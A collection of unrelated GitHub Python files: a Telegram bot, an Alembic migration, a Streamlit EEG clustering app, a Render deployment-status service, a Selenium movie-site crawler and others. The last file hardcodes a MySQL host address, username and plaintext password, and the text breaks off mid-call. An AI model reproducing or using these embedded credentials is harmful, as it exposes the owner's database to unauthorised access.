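#   server.stop()  # unblocks serve_forever() and waits for the shutdown event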
|
markelov-alex/py-sockets
|
napalm/socket/server.py
|
server.py
|
py
| 18,945 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17283528585
|
from solver import Solver
from config import Config
if __name__ == '__main__':
cfg = Config()
cfg.data_dir = "/data/face/parsing/dataset/ibugmask_release"
cfg.model_args.backbone = "STDCNet1446"
cfg.model_args.pretrain_model = "snapshot/STDCNet1446_76.47.tar"
solver = Solver(cfg)
solver.sample(sample_dir="/data/face/parsing/dataset/testset_210720_aligned", result_folder="result")
|
killf/U2Net4FaceParsing
|
test.py
|
test.py
|
py
| 409 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39046925212
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 11 10:48:58 2018
@author: Diogo
"""
from SQL_obj_new.DB_interaction_DDI_sql_new import _DB_interaction_DDI_SQL
class DB_interaction_DDI(object):
"""
    This class handles the source that provides information about the DDI object as it exists in the DB_interaction_DDI table of the database.
    By default, all FKs are in the last positions of the parameter declarations.
"""
def __init__(self, id_db_int_DBI = -1, designation_source = "", database_name = "INPH_proj"):
"""
Constructor of the DDI source data object. All the parameters have a default value
:param id_db_int_DBI: id of DDI interaction - -1 if unknown
        :param designation_source: designation of the DDI source
:param database_name: name of the database. See Factory_databases_access
:type id_db_int_DBI: int - not required
        :type designation_source: text - required
:type database_name: text - required
"""
self.id_db_int_DBI = id_db_int_DBI
self.designation_source = designation_source
self.database_name = database_name
def get_all_DDI_sources(self):
"""
return an array with all the DDI source in the database
:return: array of DDI source
:rtype: array(DB_interaction_DDI)
"""
listOfDomainsSources = []
sqlObj = _DB_interaction_DDI_SQL(db_name = self.database_name)
results = sqlObj.select_all_sources_DDI_name()
for element in results:
listOfDomainsSources.append(DB_interaction_DDI(element[0], element[1]))
return listOfDomainsSources
def create_DDI_source(self):
"""
Insert a DDI source in the database
        The DDI source has a:
- designation of the source
:return: id of the DDI source and update the id of the object
:rtype int
"""
sqlObj = _DB_interaction_DDI_SQL(db_name = self.database_name)
value_interaction_id = sqlObj.insert_DDI_source_return_id(self.designation_source)
self.id_db_int_DBI = value_interaction_id
return value_interaction_id
def create_DDI_source_if_not_exists(self):
"""
        Insert a DDI source in the database if it does not already exist
        The DDI source has a:
- designation of the source
:return: id of the DDI source and update the id of the object
:rtype int
"""
sqlObj = _DB_interaction_DDI_SQL(db_name = self.database_name)
value_interaction_id = sqlObj.insert_DDI_source_return_id_if_not_exists(self.designation_source)
self.id_db_int_DBI = value_interaction_id
return value_interaction_id
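# Usage sketch (illustrative only; assumes a reachable database configured via
# Factory_databases_access, and the designation value below is made up):
#
#   source = DB_interaction_DDI(designation_source="3did", database_name="INPH_proj")
#   source_id = source.create_DDI_source_if_not_exists()
#   all_sources = DB_interaction_DDI().get_all_DDI_sources()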
|
diogo1790/inphinity
|
objects_new/DB_interaction_DDI_new.py
|
DB_interaction_DDI_new.py
|
py
| 2,715 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33155203825
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from telegram.ext import Updater, CommandHandler
updater = Updater('TOKEN')
def start_method(bot, update):
bot.sendMessage(update.message.chat_id, "سلام")
start_command = CommandHandler('start', start_method)
updater.dispatcher.add_handler(start_command)
updater.start_polling()
# for exit
updater.idle()
|
rasoolhp/free-telegram-bot
|
bot.py
|
bot.py
|
py
| 412 |
python
|
en
|
code
| 5 |
github-code
|
6
|
17913448581
|
"""Made email unique
Revision ID: ff6f0a832e3a
Revises: 876813ef988d
Create Date: 2022-08-09 16:32:43.590993
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ff6f0a832e3a'
down_revision = '876813ef988d'
branch_labels = None
depends_on = None
def upgrade() -> None:
# ### commands auto generated by Alembic - please adjust! ###
op.create_unique_constraint(None, 'users', ['email'])
# ### end Alembic commands ###
def downgrade() -> None:
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'users', type_='unique')
# ### end Alembic commands ###
|
djangbahevans/wallet-clone
|
backend/alembic/versions/ff6f0a832e3a_made_email_unique.py
|
ff6f0a832e3a_made_email_unique.py
|
py
| 667 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3148189147
|
# Returns a string in which consecutive characters of S are not repeated more than R times
def sin_repetidos(str,number):
cantidad = 0
final = ""
anterior = ""
for caracter in str:
cantidad = cantidad+1
if(caracter != anterior):
cantidad=1
anterior=caracter
if(cantidad <= number):
final = final + caracter
return final
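# Small self-check (illustrative): with R = 2, runs longer than two identical
# characters are trimmed down to two.
if __name__ == "__main__":
    print(sin_repetidos("aaabbc", 2))  # expected output: "aabbc"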
|
jazz-bee/sin_repetidos
|
ejercicio.py
|
ejercicio.py
|
py
| 403 |
python
|
es
|
code
| 0 |
github-code
|
6
|
7002507231
|
import json
from .db_utils import conn as db_conn
from enum import Enum
class NotificationType(Enum):
questionEndorse = 'question_endorsed'
answerEndorse = 'answer_endorsed'
answerUser = 'answer_user'
answerSaved = 'answer_saved'
NOTIFICATION_TEXT_BY_TYPE = {
NotificationType.questionEndorse: "endorsed your question",
NotificationType.answerEndorse: "endorsed your answer",
NotificationType.answerUser: "answered your question",
NotificationType.answerSaved: "answered a question you saved"
}
DATA_FIELDS_BY_TYPE = {
NotificationType.questionEndorse: set(['question_id']),
NotificationType.answerEndorse: set(['question_id', 'answer_id']),
NotificationType.answerUser: set(['question_id', 'answer_id']),
NotificationType.answerSaved: set(['question_id', 'answer_id'])
}
def push_notification(user_id, notif_type, data):
cur = db_conn.cursor()
if set(data.keys()) != DATA_FIELDS_BY_TYPE[notif_type]:
        raise ValueError("Invalid data fields for notification type {}; expected {}".format(data.keys(), DATA_FIELDS_BY_TYPE[notif_type]))
cur.execute("INSERT INTO notifications (user_id, type, data) VALUES (%s, %s, %s)", (user_id, notif_type.value, json.dumps(data)))
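# Usage sketch (IDs are illustrative; requires the shared connection from db_utils):
#
#   push_notification(
#       user_id=42,
#       notif_type=NotificationType.answerUser,
#       data={"question_id": 7, "answer_id": 13},
#   )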
|
minupalaniappan/gradfire
|
daviscoursesearch/flaskapp/utils/notif_utils.py
|
notif_utils.py
|
py
| 1,239 |
python
|
en
|
code
| 12 |
github-code
|
6
|
35757262298
|
from clases import Automovil
# Get the data, using the example prompt texts
def obtener_datos():
msg = [
'Inserte la marca del automóvil: ',
'Inserte el modelo: ',
'Inserte el número de ruedas: ',
'Inserte la velocidad en km/h: ',
'Inserte el cilindraje en cc: '
]
datos = []
for m in msg:
datos.append(input(m))
return datos
# Using the example prompt texts
def main():
instancias = {}
    # Ask for the data and store it
cantidad = int(input("Cuantos vehículos desea insertar: "))
for i in range(1,cantidad+1):
print(f"\nDatos del automóvil {i}")
instancias[i] = Automovil(*obtener_datos())
    # Show the data
print("\nImprimiendo por pantalla los Vehículos:\n")
for n,veh in instancias.items():
print(f"Datos del automóvil {n}:", veh)
# Generic version, independent of the attribute names and how many there are
def main2():
instancias = {}
atributos = list(Automovil.__init__.__code__.co_varnames)[1:]
    # Ask for the data and store it
cantidad = int(input("Cuantos vehículos desea insertar: "))
for i in range(1,cantidad+1):
print(f"\nDatos del automóvil {i}")
datos = []
for att in atributos:
datos.append(input(f"Inserte {att}: "))
instancias[i] = Automovil(*datos)
    # Show the data
print("\nImprimiendo por pantalla los Vehículos:\n")
for n,veh in instancias.items():
print(f"Datos del automóvil {n}:", veh.get_str())
if __name__ == "__main__":
main()
print("\n\nAhora, versión genérica (independiente de los atributos)\n")
main2()
|
tiango-git/full-stack-mod4-eval
|
parte1/main.py
|
main.py
|
py
| 1,783 |
python
|
es
|
code
| 0 |
github-code
|
6
|
32174246789
|
from android.droidagent import DroidAdapter, DroidElement
from rpa import InputMethod
import time
'''
A sample that opens the contact book and looks up the phone number for a given name
'''
agent = DroidAdapter()
DroidElement.setAgent(agent)
person = 'Bart'
DroidElement().start('contacts')
time.sleep(1)
DroidElement('txt_contact_search').click()
DroidElement().typetext(person)
DroidElement('txt_contact_search_first').click()
phone = DroidElement('txt_contact_details').gettext()
print('%s\'Phone Number is %s'%(person, phone))
|
bartmao/pyRPA
|
samples/sample-andriod.py
|
sample-andriod.py
|
py
| 524 |
python
|
en
|
code
| 20 |
github-code
|
6
|
37682586689
|
"""
Challenge 18: Print the first 100 prime numbers
"""
import math
def isPrime(n) -> bool:
if n < 2:
return False
if n == 2:
return True
maxDiv = math.sqrt(n)
i = 2
while i <= maxDiv:
if n % i == 0:
return False
i += 1
return True
def printPrime(nPrimes):
n = 0
i = 2
while n < nPrimes:
if isPrime(i):
print(n, "--->", i)
n += 1
i += 1
# Driver Method
def main():
printPrime(100)
if __name__ == "__main__":
main()
|
mofirojean/50-Coding-Challenge
|
50 Coding Challenge Part I/Python/Challenge18.py
|
Challenge18.py
|
py
| 562 |
python
|
en
|
code
| 2 |
github-code
|
6
|
32672071641
|
"""Search: 'python filter one list based on another' to solve"""
import string
import unittest
if not hasattr(unittest.TestCase, 'assertCountEqual'):
unittest.TestCase.assertCountEqual = unittest.TestCase.assertItemsEqual #kinda like method_override in npm
def test_blah():
txt = ['I', 'like', 'to', 'eat', 'unhealthy', 'food', 'such', 'as', 'pizza', 'salad', 'and', 'popsicles']
blocked = ['unhealthy', 'pizza', 'cake']
assert redact_words(txt, blocked) == ['I', 'like', 'to', 'eat', 'food', 'such', 'as', 'salad', 'and', 'popsicles']
def redact_words(words, banned_words):
    censored_ver = []
    for word in words:
        # Keep the word only if it is not in the banned list
        if word not in banned_words:
            censored_ver.append(word)
    return censored_ver
#welp, Lucia explained why I was getting an index error
#I'm using a counter based on WORDS array's length, to index in BANNED_WORDS array
#ofc i'm getting an index error.. facepalm!!
#thanks lucia!!
"""
Hooray pseudocode
Params: 2 arrays of strings
1. the text
2. the redacted words
Returns: array of words in array (1) that are NOT in (2)
1. Instantiate empty array
2. Lowercase contents of array (1) -- maybe later
3. For each word in array (1), IF that word is NOT in array (1), THEN add it to the empty array from STEP #1
4. Once each word from array (2) has been so checked, return the array from STEP #1
"""
|
ckim42/Core-Data-Structures
|
Lessons/source/redact_problem.py
|
redact_problem.py
|
py
| 1,547 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71270407548
|
"""
This question is asked by Apple. Given two binary strings
(strings containing only 1s and 0s) return their sum (also as a binary string).
Note: neither binary string will contain leading 0s unless the string itself is 0
Ex: Given the following binary strings...
"100" + "1", return "101"
"11" + "1", return "100"
"1" + "0", return "1"
"""
from collections import deque
def addBinary(number1:str, number2: str) -> str:
# Time: O(n) -> where "n" is the number of bits of the final sum
# Space: O(n) or O(1) if we don't consider the output
n1Pointer = len(number1)-1
n2Pointer = len(number2)-1
output = deque()
carry = 0
while n1Pointer >= 0 or n2Pointer >= 0:
n1Digit = 0 if n1Pointer < 0 else int(number1[n1Pointer])
n2Digit = 0 if n2Pointer < 0 else int(number2[n2Pointer])
currDigitSum = n1Digit + n2Digit + carry
carry = 1 if currDigitSum >= 2 else 0
if currDigitSum == 2:
currDigitSum = 0
elif currDigitSum == 3:
currDigitSum = 1
output.appendleft(str(currDigitSum)) # O(1)
n1Pointer -= 1
n2Pointer -= 1
if carry:
output.appendleft(str(carry)) # O(1)
return "".join(output) # O(n)
assert addBinary("100", "1") == "101"
assert addBinary("11", "1") == "100"
assert addBinary("1", "0") == "1"
print("Passed all testes!")
|
lucasbivar/coding-interviews
|
the-daily-byte/week_01/day_05_add_binary.py
|
day_05_add_binary.py
|
py
| 1,314 |
python
|
en
|
code
| 0 |
github-code
|
6
|
45641177766
|
import streamlit as st
import pandas as pd
import numpy as np
import umap
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from scipy.cluster.hierarchy import dendrogram, linkage, fcluster
from sklearn.decomposition import PCA
import webbrowser
# Set width mode to wide to display plots better
st.set_page_config(layout="wide")
# Streamlit Configuration
st.set_option('deprecation.showPyplotGlobalUse', False)
# Sidebar
st.sidebar.header("Schizophrenia Data Analysis")
uploaded_file = st.sidebar.file_uploader("Choose a CSV file", type="csv")
# Sliders for UMAP and KMeans parameters
st.sidebar.subheader("UMAP Parameters")
n_neighbors = st.sidebar.slider("Number of Neighbors", 2, 50, 5)
min_dist = st.sidebar.slider("Minimum Distance", 0.0, 1.0, 0.3, 0.1)
st.sidebar.subheader("Clustering Parameters")
n_clusters = st.sidebar.slider("Number of Clusters (KMeans)", 2, 20, 5)
n_dendro_clusters = st.sidebar.slider("Number of Clusters (Dendrogram)", 2, 20, 5)
# Add option to choose linkage method for dendrogram
linkage_methods = ["ward", "single", "complete", "average"]
selected_linkage_method = st.sidebar.selectbox("Linkage Method for Dendrogram", linkage_methods, 0)
# Checkbox to toggle PCA and UMAP visualization
show_pca = st.sidebar.checkbox("Show PCA Visualization", False)
show_umap = st.sidebar.checkbox("Show UMAP Visualization", False)
# Load the data
def load_data(uploaded_file):
data = pd.read_csv(uploaded_file)
return data
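# Expected CSV layout (inferred from the column accesses below): a 'Group' column
# with 0 = control and 1 = schizophrenia, plus feature columns whose names start
# with 'avpp_<band>' for the delta/theta/alpha/beta/gamma bands.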
# Function to perform UMAP embedding and K-means clustering
def umap_and_kmeans(band_data, n_neighbors=n_neighbors, min_dist=min_dist, n_clusters=n_clusters):
embedding = umap.UMAP(n_neighbors=n_neighbors, min_dist=min_dist, random_state=42).fit_transform(band_data)
kmeans_labels = KMeans(n_init=4, n_clusters=n_clusters, random_state=42).fit(embedding).labels_
return embedding, kmeans_labels
# Function to plot UMAP embedding results
def plot_umap_embedding(embedding, kmeans_labels, ax, title):
ax.scatter(embedding[:, 0], embedding[:, 1], c=kmeans_labels, cmap='rainbow', s=20)
# add a text with umap parameters and kmeans cluster number
ax.text(0.99, 0.01, f"n_neighbors={n_neighbors}, min_dist={min_dist}, n_clusters={n_clusters}",
transform=ax.transAxes, ha='right', va='bottom', size=10)
ax.set_title(title)
def plot_dendrogram_colored_ticks(band_data, ax, title, method='ward'):
"""
Plot the dendrogram with correctly colored tick numbers for the "All Subjects" group.
"""
# Hierarchical clustering
Z = linkage(band_data, method=method)
# Plot the dendrogram
ddata = dendrogram(Z, ax=ax, leaf_rotation=90)
ax.set_title(title + " Dendrogram (" + method + " linkage)")
ax.set_xlabel("Sample Index")
ax.set_ylabel("Distance")
# Color the tick numbers based on control and schizophrenia subjects
control_indices = data_control.index.to_list()
schizophrenia_indices = data_schizophrenia.index.to_list()
# Get the x-tick labels (leaf labels) from the dendrogram
leaf_labels = ddata['leaves']
# Iterate through x-ticks and color them based on the group
for idx, label in enumerate(ax.get_xticklabels()):
label_idx = leaf_labels[idx]
if label_idx in control_indices:
label.set_color('black')
elif label_idx in schizophrenia_indices:
label.set_color('red')
def plot_dendrogram_and_pca_with_correct_colored_ticks(band_data, ax_dendro, title, color_ticks=False, method='ward'):
"""
Plot the dendrogram with optionally colored tick numbers and PCA visualization on the given axes.
"""
# Hierarchical clustering
Z = linkage(band_data, method=method)
# Plot the dendrogram
ddata = dendrogram(Z, ax=ax_dendro, leaf_rotation=90)
    ax_dendro.set_title(str(title) + " Dendrogram (" + str(method) + " linkage)")
ax_dendro.set_xlabel("Sample Index")
ax_dendro.set_ylabel("Distance")
if color_ticks:
# Color the tick numbers based on control and schizophrenia subjects
control_indices = data_control.index.to_list()
schizophrenia_indices = data_schizophrenia.index.to_list()
# Get the x-tick labels (leaf labels) from the dendrogram
leaf_labels = ddata['leaves']
# Iterate through x-ticks and color them based on the group
for idx, label in enumerate(ax_dendro.get_xticklabels()):
label_idx = leaf_labels[idx]
if label_idx in control_indices:
label.set_color('black')
elif label_idx in schizophrenia_indices:
label.set_color('red')
return Z
def plot_band_pca(band_data, Z, ax_pca, title):
# Cut the dendrogram to obtain 3 clusters
labels = fcluster(Z, t=n_dendro_clusters, criterion='maxclust')
band_data['Cluster'] = labels
# Use PCA to reduce the data to 2D
pca = PCA(n_components=2)
band_pca = pca.fit_transform(band_data.drop('Cluster', axis=1))
# return band_pca
# Create a scatter plot for PCA reduced data
ax_pca.scatter(band_pca[:, 0], band_pca[:, 1], c=band_data['Cluster'], cmap='rainbow')
ax_pca.set_title(title + " 2D PCA")
ax_pca.set_xlabel("Principal Component 1")
ax_pca.set_ylabel("Principal Component 2")
# If a CSV file is uploaded
if uploaded_file:
st.write("Dataset loaded successfully!")
# Load the data
data = load_data(uploaded_file)
# Split data into control and schizophrenia groups
data_control = data[data['Group'] == 0]
data_schizophrenia = data[data['Group'] == 1]
data_full = data
# Combined dendrogram for "All Subjects"
all_bands_data = pd.concat([
data.loc[:, data.columns.str.startswith('avpp_delta')],
data.loc[:, data.columns.str.startswith('avpp_theta')],
data.loc[:, data.columns.str.startswith('avpp_alpha')],
data.loc[:, data.columns.str.startswith('avpp_beta')],
data.loc[:, data.columns.str.startswith('avpp_gamma')]
], axis=1)
fig, ax = plt.subplots(figsize=(16, 8))
plot_dendrogram_colored_ticks(all_bands_data, ax, "All Bands Combined", method=selected_linkage_method)
plt.tight_layout()
# Save the dendrogram plot to a PNG file
dendrogram_filename = "Combined_Dendrogram_plot.png"
fig.savefig(dendrogram_filename, dpi=300)
# Provide a download button for the dendrogram PNG file
with open(dendrogram_filename, "rb") as f:
btn = st.download_button(
label="Download Combined Dendrogram Plot",
data=f,
file_name=dendrogram_filename,
mime="image/png"
)
st.pyplot(fig)
st.write("EDA - Exploratory Data Analysis")
# Detect available bands from column names
bands_list = ['delta', 'theta', 'alpha', 'beta', 'gamma']
available_bands = [band for band in bands_list if any(data.columns.str.startswith(f'avpp_{band}'))]
# Note: Replace all `plt.show()` with `st.pyplot()`
# Create the plots with dendrogram, PCA, and UMAP visualizations
nrows = 3 if show_pca and show_umap else 2 if show_pca or show_umap else 1 # Number of rows in the plot
    height = 15 if show_pca and show_umap else 10 if show_pca or show_umap else 5  # Height of the plot
for data_group, title in zip([data_schizophrenia, data_control, data_full], ["Schizophrenia", "Control", "All Subjects"]):
        fig, axes = plt.subplots(nrows=nrows, ncols=len(available_bands), figsize=(36, height))
fig.suptitle(title, fontsize=25)
# Ensure axes is 2D
if nrows == 1:
axes = axes.reshape(1, -1)
# Create band data based on detected bands for the current data group
bands = [(band.capitalize(), data_group.loc[:, data_group.columns.str.startswith(f'avpp_{band}')]) for band in available_bands]
# Configure the axes based on the selected visualizations
axes_mapping = [0] # dendrogram axes index is always 0
if show_pca:
axes_mapping.append(len(axes_mapping))
if show_umap:
axes_mapping.append(len(axes_mapping))
# Plot dendrogram, PCA, and UMAP visualizations for each band
for col, (band_name, band_data) in enumerate(bands):
ax_dendro = axes[axes_mapping[0]][col]
ax_dendro.set_title(band_name)
color_ticks = True if title == "All Subjects" else False
# Dendrogram plots using previous functions
Z = plot_dendrogram_and_pca_with_correct_colored_ticks(band_data.copy(), ax_dendro, band_name, color_ticks, method=selected_linkage_method)
if show_pca:
ax_pca = axes[axes_mapping[1]][col]
plot_band_pca(band_data.copy(), Z, ax_pca, title)
if show_umap:
ax_umap = axes[axes_mapping[-1]][col]
embedding, kmeans_labels = umap_and_kmeans(band_data)
plot_umap_embedding(embedding, kmeans_labels, ax_umap, band_name + " 2D UMAP")
plt.tight_layout()
plt.subplots_adjust(top=0.85)
# Save the plot to a PNG file
plot_filename = f"{title.replace(' ', '_')}_plot.png"
fig.savefig(plot_filename, dpi=600)
# plt.show()
# st.pyplot()
# st.image(plot_filename, use_column_width=True, clamp=True)
st.pyplot(fig)
plt.close(fig)
# Provide a download button for the PNG file
with open(plot_filename, "rb") as f:
btn = st.download_button(
label=f"Download {title} Plot",
data=f,
file_name=plot_filename,
mime="image/png"
)
|
furmanlukasz/clusteringSchizphrenia
|
app.py
|
app.py
|
py
| 9,731 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25570985502
|
from View.View import *
from Calculator.Types.Rational import Rational
from Calculator.Types.Complex import Complex
def Start():
while True:
type_choice = input(f"{choice_type_values} > ")
if type_choice == "1":
num1 = Rational("Первое число")
num2 = Rational("Второе число")
elif type_choice == "2":
num1 = Complex("Первое число")
num2 = Complex("Второе число")
else:
return 0
type_operation = input(f"{choice_operation} > ")
if type_operation == "1":
num1.summarize(num2)
elif type_operation == "2":
num1.subtraction(num2)
elif type_operation == "3":
num1.multiplication(num2)
elif type_operation == "4":
num1.division(num2)
elif type_operation == "5":
continue
else:
"Неверное значение. Программа прекращает работать"
return 0
show_result(num1)
|
kdmitry0688/JAVA_OOP
|
HW7/Control.py
|
Control.py
|
py
| 1,114 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12731744615
|
#!/usr/bin/env python3
# create a GUI in Python
from tkinter import *
'''class App(tk.Frame):
def __init__(self,master=None):
super().__init__(master)
self.master=master
self.pack()
self.create_widgets()
def create_widgets(self):
'''
#create root window
root =Tk()
#dimensions
root.title("GUI test")
root.geometry('400x300')
#widgets
#menu-bar
myMenu=Menu(root)
root.config(menu=myMenu)
fileMenu=Menu(myMenu)
myMenu.add_cascade(label='File',menu=fileMenu)
fileMenu.add_command(label='New')
fileMenu.add_command(label='Open...')
fileMenu.add_separator()
fileMenu.add_command(label='Exit',command=root.quit)
helpMenu=Menu(myMenu)
myMenu.add_cascade(label='Help',menu=helpMenu)
helpMenu.add_command(label='About')
#add a label to root window
Label(root,text='First Name').grid(row=0)
Label(root,text='Last Name').grid(row=1)
entry1=Entry(root)
entry2=Entry(root)
entry1.grid(column=1,row=0)
entry2.grid(column=1,row=1)
lbl=Label(root,text="Are you in?")
lbl.grid(column=0,row=2)
Label(root,text='Languages').grid(row=3)
Label(root,text='OS').grid(row=4)
#list
listBox=Listbox(root)
listBox.grid(column=1,row=3)
myList=["C++","Python","JavaScript","sed/AWK","Ruby"]
for zz in range(len(myList)):
#print(zz+1,myList[zz])
listBox.insert(zz+1,myList[zz])
#radiobutton
v=IntVar()
Radiobutton(root, text='Debian 10', variable=v, value=1).grid(column=1,row=4)
Radiobutton(root, text='Windows 10', variable=v, value=2).grid(column=2,row=4)
#function to display text when a button is clicked
def click_me():
res="You wrote: "+txt.get()
lbl.configure(text = res)
#button widget
btn=Button(root,text="Click me",fg="red",command=click_me)
btn.grid(column=2,row=2) #position on window
#adding entry field
txt=Entry(root,width=10)
txt.grid(column=1,row=2)
root.mainloop()
|
ndlopez/learn_python
|
learn_tk/tk_gui.py
|
tk_gui.py
|
py
| 1,832 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27535780328
|
import time
from functools import wraps
from typing import Dict
import requests
from constants import GITHUB_ROOT, RENDER_ROOT
from logging_config import logger
from render_api.utils import get_headers, get_github_status
session = requests.Session()
# Decorator for logging and error handling
def log_and_handle_errors(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as exc:
logger.error(f"Exception in {func.__name__}| {exc}")
return None
return wrapper
@log_and_handle_errors
def manage_deployment_status(data: Dict):
pr = data["pull_request"]
repo_data = data["repository"]
state, merged = pr["state"], pr["merged"]
user_repo, repo_url = repo_data["full_name"], repo_data["html_url"]
owner, repo = repo_data["owner"]["login"], repo_data["name"]
if not (merged and state == "closed"):
return
service_id = get_render_service_id(repo_url)
if not service_id:
logger.error("Render service ID is null")
return
deployment_status = get_render_deployment_status(service_id)
if not deployment_status:
return
process_deployment_status(user_repo, repo, owner, deployment_status, service_id)
@log_and_handle_errors
def process_deployment_status(user_repo, repo, owner, deployment_status, service_id):
github_status = get_github_status(deployment_status["status"])
deployment_id = deployment_status["id"]
github_deployment_id = create_github_deployment(user_repo, repo, owner)
if not github_deployment_id:
logger.error("Failed to create GitHub deployment")
return
update_github_deployment_status(
owner, repo, github_status, deployment_id, user_repo, github_deployment_id, service_id
)
@log_and_handle_errors
def update_github_deployment_status(
owner, repo, status, deployment_id, user_repo, github_deployment_id, service_id
):
create_github_deployment_status(
owner, repo, status, deployment_id, user_repo, github_deployment_id
)
new_status = ""
while new_status not in ["failure", "success"]:
new_render_deployment_status = get_render_deployment_status(service_id)
new_status = get_github_status(new_render_deployment_status["status"])
time.sleep(
10
) # You can remove it (but it's better to not spam the render API [400 GET request/minutes])
create_github_deployment_status(
owner, repo, new_status, deployment_id, user_repo, github_deployment_id
)
@log_and_handle_errors
def get_render_deployment_status(service_id: str) -> Dict:
url = f"{RENDER_ROOT}/services/{service_id}/deploys"
response = session.get(url, headers=get_headers("render"))
logger.info(f"GET: {url} executed with status_code: {response.status_code}")
data = response.json()[0]["deploy"]
return {"status": data["status"], "id": data["id"]}
@log_and_handle_errors
def get_render_service_id(repo: str) -> str:
url = f"{RENDER_ROOT}/services"
response = session.get(url, headers=get_headers("render"))
logger.info(f"GET: {url} executed with status_code: {response.status_code}")
for service in response.json():
if service["service"]["repo"] == repo:
return service["service"]["id"]
@log_and_handle_errors
def create_github_deployment(user_repo: str, repo: str, owner: str) -> str:
url = f"{GITHUB_ROOT}/repos/{user_repo}/deployments"
data = {
"owner": owner,
"repo": repo,
"ref": "main",
"environment": "Production",
"production_environment": True,
"description": "Deployment status from Render",
}
response = session.post(url, headers=get_headers("github"), json=data)
logger.info(f"POST: {url} executed with status_code: {response.status_code}")
return response.json().get("id")
@log_and_handle_errors
def create_github_deployment_status(
owner: str,
repo: str,
status: str,
render_deployment_id: str,
user_repo: str,
github_deployment_id: str,
):
url = f"{GITHUB_ROOT}/repos/{user_repo}/deployments/{github_deployment_id}/statuses"
data = {
"owner": owner,
"repo": repo,
"state": status,
"deployment_id": render_deployment_id,
"environment": "Production",
"description": "Deployment status from Render",
}
response = session.post(url, headers=get_headers("github"), json=data)
logger.info(f"POST: {url} executed with status_code: {response.status_code}")
|
Fyleek/render-api
|
render_api/services/deployment_status_service.py
|
deployment_status_service.py
|
py
| 4,593 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73574084347
|
import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "Deuces Poker Client",
version = "1.0",
author = "Daniel Fonseca Yarochewsky",
description = ("A client to simulate a Texa Holdem Poker Table"),
license = "Free",
packages=['deuces-master', 'termcolor'],
long_description=read('README')
)
|
yarochewsky/poker-client
|
setup.py
|
setup.py
|
py
| 409 |
python
|
en
|
code
| 1 |
github-code
|
6
|
23609310998
|
import selenium
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
from bs4 import BeautifulSoup
import pymysql
from db_setting import db
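# db_setting.db is expected to be a dict exposing the keys used below:
# {'host': ..., 'port': ..., 'user': ..., 'password': ..., 'db': ..., 'charset': ...}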
# Import the time module, used to wait for page loads
import time
# Option to keep the browser window from closing
chrome_options = Options()
chrome_options.add_experimental_option("detach", True)
# URL of the theater page
CGV_URL = 'http://www.cgv.co.kr/movies/?lt=1&ft=1'
driver = webdriver.Chrome(options=chrome_options)
driver.delete_all_cookies()
driver.get(url=CGV_URL)
# Wait briefly so the page finishes loading
time.sleep(0.3)
# Check whether "show more" buttons exist
btn_mores = driver.find_elements(By.CLASS_NAME, 'btn-more-fontbold')
if btn_mores:
for btn in btn_mores:
btn.click()
time.sleep(0.3)
# Click through each movie
box_elements = driver.find_elements(By.CLASS_NAME, 'box-image')
href_list = []
for element in box_elements:
href_list.append(element.find_element(By.TAG_NAME, 'a').get_attribute('href'))
links = []
for href in href_list:
driver.get(href)
try:
director_dt = driver.find_element(By.XPATH, "//dt[contains(., '감독')]")
director_as = director_dt.find_elements(By.XPATH, "./following-sibling::dd[1]/a")
for director_a in director_as:
new_link = director_a.get_attribute("href")
if new_link not in links:
links.append(new_link)
actor_dt = driver.find_element(By.XPATH, "//dt[contains(., '배우')]")
actor_as = actor_dt.find_elements(By.XPATH, "./following-sibling::dd[1]/a")
for actor_a in actor_as:
new_link = actor_a.get_attribute("href")
if new_link not in links:
links.append(new_link)
except NoSuchElementException:
print("정보 없음")
time.sleep(0.1)
names = []
births = []
nations = []
for link in links:
driver.get(link)
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
    # Name
name_tag = soup.find(class_='title').find('strong').get_text(strip=True)
names.append(name_tag)
    # Fetch birth and nationality in one place
tags = soup.find(class_='spec').find('dl')
    # Birth
birth_tag_sibling = tags.find('dt', text= lambda text: text and '출생' in text)
if birth_tag_sibling:
birth_tag = birth_tag_sibling.find_next_sibling().get_text(strip=True)
else :
birth_tag = ""
births.append(birth_tag)
    # Nationality
nation_tag_sibling = tags.find('dt', text= lambda text: text and '국적' in text)
if nation_tag_sibling:
nation_tag = nation_tag_sibling.find_next_sibling().get_text(strip=True)
else :
nation_tag = ""
nations.append(nation_tag)
print("name : ", name_tag)
print("birth : ", birth_tag)
print("nation : ", nation_tag)
print("================================")
conn = pymysql.connect(host=db['host'], port=db['port'], user=db['user'], password=db['password'], db=db['db'], charset=db['charset'])
curs = conn.cursor(pymysql.cursors.DictCursor)
for name, birth, nation in zip(names, births, nations):
sql = "INSERT INTO person (name, birth, nation) VALUES (%s, %s, %s)"
val = (name, birth, nation)
curs.execute(sql, val)
conn.commit()
conn.close()
|
Ticket-Cinema/real-time-crawling
|
first_chart_crawling/actor_crawling.py
|
actor_crawling.py
|
py
| 3,333 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29818611165
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : get_content_data.py
# @Description: Fetch the text data with tags removed
# @Time : 2020-5-30 11:09 AM
# @Author : Hou
import os
import pandas as pd
import pymysql.cursors
def get_id_list():
original_data = pd.read_excel(os.path.join(os.path.abspath('../..'), 'data', 'raw', 'filtered_data.xlsx'))
id_series = original_data['id']
id_list = id_series.to_numpy()
return id_list
def get_content_data(id_list):
"""获取去标签后的文本数据"""
connection = pymysql.connect(host='58.59.18.101',
port=3306,
user='data',
password='data12399123',
database='bidding_data',
charset='utf8mb4',
